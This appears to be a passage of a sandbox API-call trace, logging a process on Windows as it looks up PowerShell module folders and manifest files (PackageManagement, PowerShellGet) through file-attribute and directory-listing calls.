1 [0157.779] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b90cc | out: lpFileInformation=0x25b90cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0157.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.779] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0157.779] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0157.779] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0157.779] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0157.779] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0157.780] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0157.783] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\keecfmwgj\\documents\\windowspowershell\\modules")) returned 0xffffffff [0157.791] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0157.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.792] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0157.792] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x31, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x30 [0157.792] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.793] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.793] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0157.793] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0157.793] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.793] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.793] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0157.793] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0157.794] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0157.794] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0157.794] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0157.794] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0157.794] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0157.794] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0157.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.794] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.795] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0157.795] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0157.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.795] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.795] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0157.795] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0157.796] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.796] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.796] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49a61de0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49a61de0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0157.796] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.796] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.797] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0157.797] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0157.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e360) returned 1 [0157.797] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e624 | out: lpFileInformation=0x5a0e624*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a3bc80, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0157.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e35c) returned 1 [0157.797] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0157.797] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0157.797] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0157.797] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0157.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.797] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25c2eb0 | out: lpFileInformation=0x25c2eb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a3bc80, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0157.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.798] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0157.798] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0157.798] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0157.798] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0157.798] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0157.798] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0157.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.798] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0157.798] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0157.799] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.799] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.799] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0157.799] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.799] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.799] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0157.800] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0157.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e360) returned 1 [0157.800] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e624 | out: lpFileInformation=0x5a0e624*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0157.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e35c) returned 1 [0157.800] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0157.800] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0157.800] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0157.800] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0157.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.800] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25c4574 | out: lpFileInformation=0x25c4574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0157.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.801] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0157.801] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0157.801] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0157.801] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0157.801] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0157.801] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0157.805] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0157.806] SetThreadErrorMode (dwNewMode=0x1, 